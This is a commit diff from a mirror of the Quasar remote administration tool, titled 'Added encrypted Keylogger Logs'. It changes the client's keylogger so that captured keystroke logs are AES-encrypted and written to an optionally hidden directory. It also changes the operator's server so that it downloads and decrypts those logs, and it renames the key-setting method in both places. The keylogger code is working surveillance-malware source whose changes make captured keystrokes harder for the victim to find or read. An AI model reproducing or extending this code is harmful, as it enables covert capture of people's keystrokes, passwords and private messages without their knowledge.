quasar
/
Quasar
mirror of https://github.com/quasar/Quasar.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

Added encrypted Keylogger Logs (#396)

This commit is contained in:
MaxXor 2015-09-18 21:22:29 +02:00
parent daee83da0a
commit 4b0466d5be
12 changed files with 126 additions and 66 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Client.Tests/Core/Encryption/AES.Tests.cs
View File

@ -14,7 +14,7 @@ namespace xClient.Tests.Core.Encryption
var input = FileHelper.GetRandomFilename(100);
var password = FileHelper.GetRandomFilename(50);
AES.PreHashKey(password);
AES.SetDefaultKey(password);
var encrypted = AES.Encrypt(input);
@ -33,7 +33,7 @@ namespace xClient.Tests.Core.Encryption
var inputByte = Encoding.UTF8.GetBytes(input);
var password = FileHelper.GetRandomFilename(50);
AES.PreHashKey(password);
AES.SetDefaultKey(password);
var encryptedByte = AES.Encrypt(inputByte);

14
Client/Core/Cryptography/AES.cs
View File

@ -9,13 +9,13 @@ namespace xClient.Core.Cryptography
public static class AES
{
private const int IVLENGTH = 16;
private static byte[] _key;
private static byte[] _defaultKey;
public static void PreHashKey(string key)
public static void SetDefaultKey(string key)
{
using (var md5 = new MD5CryptoServiceProvider())
{
_key = md5.ComputeHash(Encoding.UTF8.GetBytes(key));
_defaultKey = md5.ComputeHash(Encoding.UTF8.GetBytes(key));
}
}
@ -31,7 +31,7 @@ namespace xClient.Core.Cryptography
public static byte[] Encrypt(byte[] input)
{
if (_key == null || _key.Length == 0) throw new Exception("Key can not be empty.");
if (_defaultKey == null || _defaultKey.Length == 0) throw new Exception("Key can not be empty.");
if (input == null || input.Length == 0) throw new ArgumentException("Input can not be empty.");
byte[] data = input, encdata = new byte[0];
@ -40,7 +40,7 @@ namespace xClient.Core.Cryptography
{
using (var ms = new MemoryStream())
{
using (var aesProvider = new AesCryptoServiceProvider() { Key = _key })
using (var aesProvider = new AesCryptoServiceProvider() { Key = _defaultKey })
{
aesProvider.GenerateIV();
@ -102,7 +102,7 @@ namespace xClient.Core.Cryptography
public static byte[] Decrypt(byte[] input)
{
if (_key == null || _key.Length == 0) throw new Exception("Key can not be empty.");
if (_defaultKey == null || _defaultKey.Length == 0) throw new Exception("Key can not be empty.");
if (input == null || input.Length == 0) throw new ArgumentException("Input can not be empty.");
byte[] data = new byte[0];
@ -111,7 +111,7 @@ namespace xClient.Core.Cryptography
{
using (var ms = new MemoryStream(input))
{
using (var aesProvider = new AesCryptoServiceProvider() { Key = _key })
using (var aesProvider = new AesCryptoServiceProvider() { Key = _defaultKey })
{
byte[] iv = new byte[IVLENGTH];
ms.Read(iv, 0, IVLENGTH); // read first 16 bytes for IV, followed by encrypted message

28
Client/Core/Helper/FileHelper.cs
View File

@ -1,6 +1,8 @@
using System;
using System.IO;
using System.Text;
using xClient.Config;
using xClient.Core.Cryptography;
using xClient.Core.Data;
using xClient.Core.Utilities;
@ -144,5 +146,31 @@ namespace xClient.Core.Helper
return false;
}
}
/// <summary>
/// Appends text to a log file.
/// </summary>
/// <param name="filename">The filename of the log.</param>
/// <param name="appendText">The text to append.</param>
public static void WriteLogFile(string filename, string appendText)
{
appendText = ReadLogFile(filename) + appendText;
using (FileStream fStream = File.Open(filename, FileMode.Create, FileAccess.Write))
{
byte[] data = AES.Encrypt(Encoding.UTF8.GetBytes(appendText));
fStream.Seek(0, SeekOrigin.Begin);
fStream.Write(data, 0, data.Length);
}
}
/// <summary>
/// Reads a log file.
/// </summary>
/// <param name="filename">The filename of the log.</param>
public static string ReadLogFile(string filename)
{
return File.Exists(filename) ? Encoding.UTF8.GetString(AES.Decrypt(File.ReadAllBytes(filename))) : string.Empty;
}
}
}

51
Client/Core/Utilities/Keylogger.cs
View File

@ -245,7 +245,7 @@ namespace xClient.Core.Utilities
{
bool writeHeader = false;
string fileName = Path.Combine(LogDirectory, DateTime.Now.ToString("MM-dd-yyyy"));
string filename = Path.Combine(LogDirectory, DateTime.Now.ToString("MM-dd-yyyy"));
try
{
@ -254,47 +254,40 @@ namespace xClient.Core.Utilities
if (!di.Exists)
di.Create();
if(Settings.HIDELOGDIRECTORY)
if (Settings.HIDELOGDIRECTORY)
di.Attributes = FileAttributes.Directory | FileAttributes.Hidden;
if (!File.Exists(fileName))
if (!File.Exists(filename))
writeHeader = true;
using (FileStream fileStream = new FileStream(fileName, FileMode.Append, FileAccess.Write))
StringBuilder logFile = new StringBuilder();
if (writeHeader)
{
using (StreamWriter sw = new StreamWriter(fileStream))
{
try
{
if (writeHeader)
{
sw.WriteLine("<meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on " +
DateTime.Now.ToString("dd.MM.yyyy HH:mm") + "<br><br>");
logFile.Append(
"<meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on " +
DateTime.Now.ToString("dd.MM.yyyy HH:mm") + "<br><br>");
// Write out our coloring scheme that will be used by the elements
// generated by the logger, and display paragaphs without line breaks
// h = Denotes highlighted text (blue color).
sw.WriteLine("<style>.h { color: 0000ff; display: inline; }</style>");
logFile.Append("<style>.h { color: 0000ff; display: inline; }</style>");
if (_logFileBuffer.Length > 0)
sw.Write(_logFileBuffer);
_lastWindowTitle = string.Empty;
}
else
sw.Write(_logFileBuffer);
}
catch
{
}
}
_lastWindowTitle = string.Empty;
}
if (_logFileBuffer.Length > 0)
{
logFile.Append(_logFileBuffer);
}
FileHelper.WriteLogFile(filename, logFile.ToString());
logFile.Clear();
}
catch
{
}
_logFileBuffer = new StringBuilder();
_logFileBuffer.Clear();
}
}
}

2
Client/Program.cs
View File

@ -90,7 +90,7 @@ namespace xClient
if (!MutexHelper.CreateMutex(Settings.MUTEX) || hosts.IsEmpty || string.IsNullOrEmpty(Settings.VERSION)) // no hosts to connect
return false;
AES.PreHashKey(Settings.PASSWORD);
AES.SetDefaultKey(Settings.PASSWORD);
ClientData.InstallPath = Path.Combine(Settings.DIR, ((!string.IsNullOrEmpty(Settings.SUBFOLDER)) ? Settings.SUBFOLDER + @"\" : "") + Settings.INSTALLNAME);
GeoLocationHelper.Initialize();

4
Server.Tests/Core/Encryption/AES.Tests.cs
View File

@ -14,7 +14,7 @@ namespace xServer.Tests.Core.Encryption
var input = FileHelper.GetRandomFilename(100);
var password = FileHelper.GetRandomFilename(50);
AES.PreHashKey(password);
AES.SetDefaultKey(password);
var encrypted = AES.Encrypt(input);
@ -33,7 +33,7 @@ namespace xServer.Tests.Core.Encryption
var inputByte = Encoding.UTF8.GetBytes(input);
var password = FileHelper.GetRandomFilename(50);
AES.PreHashKey(password);
AES.SetDefaultKey(password);
var encryptedByte = AES.Encrypt(inputByte);

41
Server/Core/Commands/SurveillanceHandler.cs
View File

@ -3,6 +3,7 @@ using System.IO;
using System.Linq;
using System.Threading;
using xServer.Core.Data;
using xServer.Core.Helper;
using xServer.Core.Networking;
using xServer.Core.Packets.ClientPackets;
using xServer.Core.Packets.ServerPackets;
@ -130,25 +131,37 @@ namespace xServer.Core.Commands
destFile.AppendBlock(packet.Block, packet.CurrentBlock);
if (packet.Index == packet.FileCount && (packet.CurrentBlock + 1) == packet.MaxBlocks)
if ((packet.CurrentBlock + 1) == packet.MaxBlocks)
{
FileInfo[] iFiles = new DirectoryInfo(Path.Combine(client.Value.DownloadDirectory, "Logs\\")).GetFiles();
if (iFiles.Length == 0)
return;
foreach (FileInfo file in iFiles)
try
{
File.WriteAllText(downloadPath, FileHelper.ReadLogFile(downloadPath));
}
catch
{
if (client.Value == null || client.Value.FrmKl == null)
break;
client.Value.FrmKl.AddLogToListview(file.Name);
}
if (client.Value == null || client.Value.FrmKl == null)
return;
if (packet.Index == packet.FileCount)
{
FileInfo[] iFiles =
new DirectoryInfo(Path.Combine(client.Value.DownloadDirectory, "Logs\\")).GetFiles();
client.Value.FrmKl.SetGetLogsEnabled(true);
if (iFiles.Length == 0)
return;
foreach (FileInfo file in iFiles)
{
if (client.Value == null || client.Value.FrmKl == null)
break;
client.Value.FrmKl.AddLogToListview(file.Name);
}
if (client.Value == null || client.Value.FrmKl == null)
return;
client.Value.FrmKl.SetGetLogsEnabled(true);
}
}
}

14
Server/Core/Cryptography/AES.cs
View File

@ -9,13 +9,13 @@ namespace xServer.Core.Cryptography
public static class AES
{
private const int IVLENGTH = 16;
private static byte[] _key;
private static byte[] _defaultKey;
public static void PreHashKey(string key)
public static void SetDefaultKey(string key)
{
using (var md5 = new MD5CryptoServiceProvider())
{
_key = md5.ComputeHash(Encoding.UTF8.GetBytes(key));
_defaultKey = md5.ComputeHash(Encoding.UTF8.GetBytes(key));
}
}
@ -31,7 +31,7 @@ namespace xServer.Core.Cryptography
public static byte[] Encrypt(byte[] input)
{
if (_key == null || _key.Length == 0) throw new Exception("Key can not be empty.");
if (_defaultKey == null || _defaultKey.Length == 0) throw new Exception("Key can not be empty.");
if (input == null || input.Length == 0) throw new ArgumentException("Input can not be empty.");
byte[] data = input, encdata = new byte[0];
@ -40,7 +40,7 @@ namespace xServer.Core.Cryptography
{
using (var ms = new MemoryStream())
{
using (var aesProvider = new AesCryptoServiceProvider() { Key = _key })
using (var aesProvider = new AesCryptoServiceProvider() { Key = _defaultKey })
{
aesProvider.GenerateIV();
@ -102,7 +102,7 @@ namespace xServer.Core.Cryptography
public static byte[] Decrypt(byte[] input)
{
if (_key == null || _key.Length == 0) throw new Exception("Key can not be empty.");
if (_defaultKey == null || _defaultKey.Length == 0) throw new Exception("Key can not be empty.");
if (input == null || input.Length == 0) throw new ArgumentException("Input can not be empty.");
byte[] data = new byte[0];
@ -111,7 +111,7 @@ namespace xServer.Core.Cryptography
{
using (var ms = new MemoryStream(input))
{
using (var aesProvider = new AesCryptoServiceProvider() { Key = _key })
using (var aesProvider = new AesCryptoServiceProvider() { Key = _defaultKey })
{
byte[] iv = new byte[IVLENGTH];
ms.Read(iv, 0, IVLENGTH); // read first 16 bytes for IV, followed by encrypted message

27
Server/Core/Helper/FileHelper.cs
View File

@ -2,6 +2,7 @@
using System.IO;
using System.Linq;
using System.Text;
using xServer.Core.Cryptography;
namespace xServer.Core.Helper
{
@ -102,5 +103,31 @@ namespace xServer.Core.Helper
return 10;
}
}
/// <summary>
/// Appends text to a log file.
/// </summary>
/// <param name="filename">The filename of the log.</param>
/// <param name="appendText">The text to append.</param>
public static void WriteLogFile(string filename, string appendText)
{
appendText = ReadLogFile(filename) + appendText;
using (FileStream fStream = File.Open(filename, FileMode.Create, FileAccess.Write))
{
byte[] data = AES.Encrypt(Encoding.UTF8.GetBytes(appendText));
fStream.Seek(0, SeekOrigin.Begin);
fStream.Write(data, 0, data.Length);
}
}
/// <summary>
/// Reads a log file.
/// </summary>
/// <param name="filename">The filename of the log.</param>
public static string ReadLogFile(string filename)
{
return File.Exists(filename) ? Encoding.UTF8.GetString(AES.Decrypt(File.ReadAllBytes(filename))) : string.Empty;
}
}
}

1
Server/Forms/FrmKeylogger.cs
View File

@ -3,7 +3,6 @@ using System.IO;
using System.Windows.Forms;
using xServer.Core.Helper;
using xServer.Core.Networking;
using xServer.Core.Utilities;
namespace xServer.Forms
{

2
Server/Forms/FrmMain.cs
View File

@ -43,7 +43,7 @@ namespace xServer.Forms
{
Instance = this;
AES.PreHashKey(Settings.Password);
AES.SetDefaultKey(Settings.Password);
#if !DEBUG
if (Settings.ShowToU)

4
Server/Forms/FrmSettings.cs
View File

@ -73,7 +73,7 @@ namespace xServer.Forms
{
try
{
AES.PreHashKey(password);
AES.SetDefaultKey(password);
if (chkUseUpnp.Checked)
{
@ -143,7 +143,7 @@ namespace xServer.Forms
Settings.AutoListen = chkAutoListen.Checked;
Settings.ShowPopup = chkPopup.Checked;
if (password != Settings.Password)
AES.PreHashKey(password);
AES.SetDefaultKey(password);
Settings.Password = password;
Settings.UseUPnP = chkUseUpnp.Checked;
Settings.ShowToolTip = chkShowTooltip.Checked;